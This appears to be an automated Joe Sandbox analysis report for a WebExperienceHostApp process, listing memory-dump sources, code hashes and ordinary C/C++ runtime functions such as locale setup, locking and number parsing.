Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: EntryInterlockedListPushabort
String ID: Windows.Foundation.Uri
API String ID: 1923770069-1377045113
Opcode ID: 9dd46fd8fc9401647eae9dbcfc85df43f07ccc2d71585183ebf6246a2c115a9c
Instruction ID: 6e65ac0788cf9087b8a9eac357b8f4e3b1c2d64d8abcf765bc3a4850a33444e7
Opcode Fuzzy Hash: 9dd46fd8fc9401647eae9dbcfc85df43f07ccc2d71585183ebf6246a2c115a9c
Instruction Fuzzy Hash: 8B414F75A09A4699EF24DF61DC523F963A5EF08B88F848432DA0E87A59DF3CE914C341

Function 00007FF625A114B0 Relevance: 3.1, APIs: 2, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF625A112E4: _initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF625A1131E

_configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF625A11523
_initialize_wide_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF625A11531

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: _configthreadlocale_initialize_onexit_table_initialize_wide_environment
String ID:
API String ID: 4292684835-0
Opcode ID: 27bbb7c7cfe90ed01a2e274412842f2dccb7c0c8a37d790c2d9923d60fa6ff1c
Instruction ID: ac6b2ad8b265c816dd4f9021ef8ab246ef3b811ac67007abf01bc628f643ebf6
Opcode Fuzzy Hash: 27bbb7c7cfe90ed01a2e274412842f2dccb7c0c8a37d790c2d9923d60fa6ff1c
Instruction Fuzzy Hash: 85114450E1924346FE793FB16D572F90A9A4F94B90F489474EA6FCA2C3ED2CAC414363

Function 00007FFDFBA43930 Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFDFBA78040: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FFDFBA43832,?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,?), ref: 00007FFDFBA7804F

std::_Facet_Register.LIBCPMT ref: 00007FFDFBA43A0B

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Facet_Register_lock_localesstd::_
String ID:
API String ID: 3986400115-0
Opcode ID: 9c1b0536e791d20bf9ccb3a21b4d26e33d38cb7de666908c62162abcb65010a3
Instruction ID: 5698cfe1d7263f552c5741639650e8c22c52e49b12a8932f89fc5866b443f588
Opcode Fuzzy Hash: 9c1b0536e791d20bf9ccb3a21b4d26e33d38cb7de666908c62162abcb65010a3
Instruction Fuzzy Hash: 01318122B0AA4390EB059F56E461A797791EB44BA4F180131DA7D073FEDFBCE5468300

Function 00007FF625A1480C Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF625A148A7

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: AcquireExclusiveLock
String ID:
API String ID: 4021432409-0
Opcode ID: f9d6cbe01079829e05a430424aa4c4ad0151c1e49743e8a65c4ac967d15e688f
Instruction ID: 630045a3a678be4d821aa093557207035af04273ef2b1fdcd87b804ba290db39
Opcode Fuzzy Hash: f9d6cbe01079829e05a430424aa4c4ad0151c1e49743e8a65c4ac967d15e688f
Instruction Fuzzy Hash: 42219321A0868282FF309F15EC43375ABA0EF54F94F488235D91D86AE5CF6CEC44C712

Function 00007FF625A11924 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0(?,?,00000000,00007FF625A1153B), ref: 00007FF625A11937

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 0693836dcfa9199c1094a91d10e525d17f108d6ee593470dcd8dc3c218559cf4
Instruction ID: c4ac892a6602c11e64fc4278c6c460c08e2f6eb46eb4097a3bd85132f5a73421
Opcode Fuzzy Hash: 0693836dcfa9199c1094a91d10e525d17f108d6ee593470dcd8dc3c218559cf4
Instruction Fuzzy Hash: CAD0A711F18243CFEF705FF04DC203422D08F18B10B045038C61BC4160DE9C5DD5C642

Function 00007FFDFBA52170 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FFDFBA44BFE,?,?,00000000,00007FFDFBA45B0B), ref: 00007FFDFBA5217F

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: setlocale
String ID:
API String ID: 1598674530-0
Opcode ID: f280d31610e951eed92d38cc3055dec39159fda93a297b1a3af7e90b306011a1
Instruction ID: bc32bcd41949d5802aec0e494ff78227f4411f607a71732f9ade432b58178ca2
Opcode Fuzzy Hash: f280d31610e951eed92d38cc3055dec39159fda93a297b1a3af7e90b306011a1
Instruction Fuzzy Hash: C3C02B71F0720390EF4C272948E352A6222BF08BC9FA04435C21D011ACCD1EC0934300

Function 665E1390 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856477092.000000006618A000.00000020.00000001.01000000.00000008.sdmp, Offset: 66160000, based on PE: true

Associated: 00000005.00000002.1856305941.0000000066160000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1856477092.0000000066161000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1858886649.00000000665F2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1859092939.00000000665F3000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1859353606.00000000665F4000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1859418063.00000000665FA000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1859453936.00000000665FB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1859513880.00000000665FC000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1859562231.00000000665FD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1859610850.00000000665FE000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1859670684.0000000066609000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1859723325.000000006660A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1859795366.000000006660F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1859835349.0000000066610000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1859965892.0000000066617000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1860081558.0000000066618000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1860158221.000000006661B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1860405055.000000006661C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1860627369.000000006661E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1863417349.0000000066620000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1863468405.0000000066621000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1863506482.0000000066623000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1863590055.0000000066627000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1863632969.0000000066628000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1863711011.000000006662A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1863748064.000000006662B000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1863796178.000000006662E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1863837119.0000000066630000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1863870268.0000000066636000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1863913081.0000000066638000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1863985815.000000006663D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864020268.000000006663F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864367565.0000000066649000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864394491.000000006664B000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864419885.0000000066650000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864445937.0000000066651000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864469047.0000000066652000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864492252.0000000066653000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864515124.0000000066660000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864515124.0000000066664000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864565868.0000000066666000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864594535.000000006666B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864618742.000000006666E000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864644738.000000006666F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864668703.0000000066671000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864697270.0000000066673000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864720577.0000000066674000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864747200.0000000066675000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1864747200.0000000066677000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_66160000_WebExperienceHostApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f52b674ee2624bcad6dfcee5780e6650afb9731572991e0341013d549dac7b7f
Instruction ID: 7277e740a5e41b2f1a5f15b6651ea5b14c8631bc11d18eec995862733fe1f106
Opcode Fuzzy Hash: f52b674ee2624bcad6dfcee5780e6650afb9731572991e0341013d549dac7b7f
Instruction Fuzzy Hash: DFF0F436600A81DECB20CF75E8903D83BA5F35939CF500016EA8987B18DB35C695CB80

Non-executed Functions

Function 00007FFE13207238 Relevance: 90.2, APIs: 36, Strings: 15, Instructions: 900COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE132072E9
DName::operator+.LIBVCRUNTIME ref: 00007FFE132073B6
DName::operator+.LIBVCRUNTIME ref: 00007FFE13207400
DName::operator+.LIBVCRUNTIME ref: 00007FFE13207421
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320748E
DName::operator+.LIBVCRUNTIME ref: 00007FFE132074A0

Strings

private: , xrefs: 00007FFE13207F40
`vtordispex{, xrefs: 00007FFE1320787D
`template static data member destructor helper', xrefs: 00007FFE13207D4B
extern "C" , xrefs: 00007FFE1320805F
[thunk]:, xrefs: 00007FFE13208006
`template static data member constructor helper', xrefs: 00007FFE13207D05
`local static destructor helper', xrefs: 00007FFE13207CC4
}' , xrefs: 00007FFE13207450, 00007FFE1320799C
`vtordisp{, xrefs: 00007FFE1320790F
/, xrefs: 00007FFE13207D52
virtual , xrefs: 00007FFE13207EC5
static , xrefs: 00007FFE13207E4A
public: , xrefs: 00007FFE13207F9C
`adjustor{, xrefs: 00007FFE1320796E
protected: , xrefs: 00007FFE13207F72

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID: /$[thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
API String ID: 2943138195-2884338863
Opcode ID: 7932c554000090ef297f9a02f93cd5f0d571843c599553f7c19302f600fa71c8
Instruction ID: 4bcb87437e1c3a1c08b71e3775379795506aaa9edab1640ccf576963e29c7ddd
Opcode Fuzzy Hash: 7932c554000090ef297f9a02f93cd5f0d571843c599553f7c19302f600fa71c8
Instruction Fuzzy Hash: C392B572918F828AEB50DB19E4802AEB7A0FBD4364F501175FA8E536B9DF7CD548CB00

Function 00007FFDFBA7FEBA Relevance: 34.3, APIs: 16, Strings: 3, Instructions: 1065COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA8006D
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA80081

Strings

ios_base::failbit set, xrefs: 00007FFDFBA8003B, 00007FFDFBA8024F, 00007FFDFBA802A3, 00007FFDFBA80452, 00007FFDFBA80667, 00007FFDFBA8087B, 00007FFDFBA808CF, 00007FFDFBA80A7E, 00007FFDFBA80C93, 00007FFDFBA80EA7, 00007FFDFBA80F00
ios_base::eofbit set, xrefs: 00007FFDFBA80042, 00007FFDFBA80256, 00007FFDFBA80459, 00007FFDFBA8066E, 00007FFDFBA80882, 00007FFDFBA80A85, 00007FFDFBA80C9A, 00007FFDFBA80EAE
ios_base::badbit set, xrefs: 00007FFDFBA8002E, 00007FFDFBA80242, 00007FFDFBA80445, 00007FFDFBA8065A, 00007FFDFBA8086E, 00007FFDFBA80A71, 00007FFDFBA80C86, 00007FFDFBA80E9A

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowstd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2003779279-1866435925
Opcode ID: 63270dc61fe217df1c8448f0cbf6375be5a82b8859e87c3c27386a3adc6e9e90
Instruction ID: 6f9091c5abcbc81939ef233775495660e59203c2ef133dde7e4e2b7fb9d5e1c1
Opcode Fuzzy Hash: 63270dc61fe217df1c8448f0cbf6375be5a82b8859e87c3c27386a3adc6e9e90
Instruction Fuzzy Hash: 77A2472271AB8681EB24CB19E4A07A9B760FB85F84F548036DB9D43BB9DFBDD445C700

Function 00007FFDFBA73808 Relevance: 27.8, APIs: 14, Strings: 1, Instructions: 1514COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140_APP ref: 00007FFDFBA73BCD
memchr.VCRUNTIME140_APP ref: 00007FFDFBA73FBA
memchr.VCRUNTIME140_APP ref: 00007FFDFBA741F4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA74C28
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA74C2F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA74C36
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA74C3D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA74C44
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA74C4B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA74C52
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA74C59
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA74C60
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA74C67
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA74DFA

Strings

0123456789-, xrefs: 00007FFDFBA739A6, 00007FFDFBA73BEF, 00007FFDFBA73FD8, 00007FFDFBA7420B

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memchr
String ID: 0123456789-
API String ID: 2740501399-3850129594
Opcode ID: 83d2e7bdc1caf0c4015a5f28662ff156985bf06449f06aa87c59ae0b43f22276
Instruction ID: d52430df532064638ee3ae8c29a2445255a58d2a15396c8ad39a9d0152032cb9
Opcode Fuzzy Hash: 83d2e7bdc1caf0c4015a5f28662ff156985bf06449f06aa87c59ae0b43f22276
Instruction Fuzzy Hash: 74E28C22B0EA8689EB008F29E46476D37A1FB45B98F655131DA6E077F9DFBDD481C300

Function 00007FFDFBA7C0E8 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 224COMMON

Download Yara Rule

APIs

iswdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA7C15C
iswdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA7C189
localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA7C193
btowc.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFDFBA7C19F
iswdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA7C1CB
iswdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA7C1F9
iswdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA7C30D
iswdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA7C336

Strings

0, xrefs: 00007FFDFBA7C1C2
0, xrefs: 00007FFDFBA7C1B2

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: iswdigit$btowclocaleconv
String ID: 0$0
API String ID: 240710166-203156872
Opcode ID: f25cfa4c62369a9808755e00a142ea6129f249c9ed0bca85ae697669705b357f
Instruction ID: a6ff3a63dbde79f540d6df1a698e54fcb1f327175a59bd19dbd628fc1ca692b7
Opcode Fuzzy Hash: f25cfa4c62369a9808755e00a142ea6129f249c9ed0bca85ae697669705b357f
Instruction Fuzzy Hash: 4C812773B1E64347E7214F29E860A7973A1FF90748F184131DA9A466E9FBBCE841C700

Function 00007FFDFBA4D7B0 Relevance: 17.1, APIs: 7, Strings: 2, Instructions: 1324COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140_APP ref: 00007FFDFBA4DD3D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA4DF87
memchr.VCRUNTIME140_APP ref: 00007FFDFBA4E09D
localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA4E188
memchr.VCRUNTIME140_APP ref: 00007FFDFBA4E35C
memchr.VCRUNTIME140_APP ref: 00007FFDFBA4E7A8
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA4E890

Strings

0123456789ABCDEFabcdef-+XxPp, xrefs: 00007FFDFBA4D8D5, 00007FFDFBA4DD78, 00007FFDFBA4E0D3, 00007FFDFBA4E37E, 00007FFDFBA4E7CA
$, xrefs: 00007FFDFBA4DC2A

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: memchr$_invalid_parameter_noinfo_noreturn$localeconv
String ID: $$0123456789ABCDEFabcdef-+XxPp
API String ID: 2141594249-3344005635
Opcode ID: 977cf47f29f2a8f28e83db93fd44151f08d7bc9cd05665774f6a172dc86905d1
Instruction ID: 3a5bc21cfa11ce186a62d33efcd652db5548f37d01f8ec2313ec7a1452d749bd
Opcode Fuzzy Hash: 977cf47f29f2a8f28e83db93fd44151f08d7bc9cd05665774f6a172dc86905d1
Instruction Fuzzy Hash: DAD25A32B0AA86C9EB558F29D16067C3761EB41B84F548431CAAE077F9CFBDE956D300

Function 00007FFDFBA4C6B0 Relevance: 17.0, APIs: 8, Strings: 1, Instructions: 1276COMMON

Download Yara Rule

Strings

0123456789-+Ee, xrefs: 00007FFDFBA4C80B, 00007FFDFBA4CB0A, 00007FFDFBA4CE92, 00007FFDFBA4D1A4, 00007FFDFBA4D6AB

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID:
String ID: 0123456789-+Ee
API String ID: 0-1347306980
Opcode ID: 8a8eef6ea48c1dcaaf896da1b674f1f61d889f311a6dd7990e35ec2479345b38
Instruction ID: 06554e6be6b89b6c906706f41378a3efa28807cee29f31067432f49282c2a0b9
Opcode Fuzzy Hash: 8a8eef6ea48c1dcaaf896da1b674f1f61d889f311a6dd7990e35ec2479345b38
Instruction Fuzzy Hash: BBC27F22B0AA82D5EB518F19D06067D3761EB41B84F548032DABE07BF9DFBDE956D300

Function 00007FFDFBA7AD0C Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 247COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140_APP ref: 00007FFDFBA7AD8E
memchr.VCRUNTIME140_APP ref: 00007FFDFBA7ADD9
localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA7ADF2
memchr.VCRUNTIME140_APP ref: 00007FFDFBA7AE2D
memchr.VCRUNTIME140_APP ref: 00007FFDFBA7AE75
isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA7AF8C
isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA7AFB4

Strings

0123456789abcdefABCDEF, xrefs: 00007FFDFBA7AD7B, 00007FFDFBA7AD9E, 00007FFDFBA7ADE8, 00007FFDFBA7AE3A
0, xrefs: 00007FFDFBA7AE1C

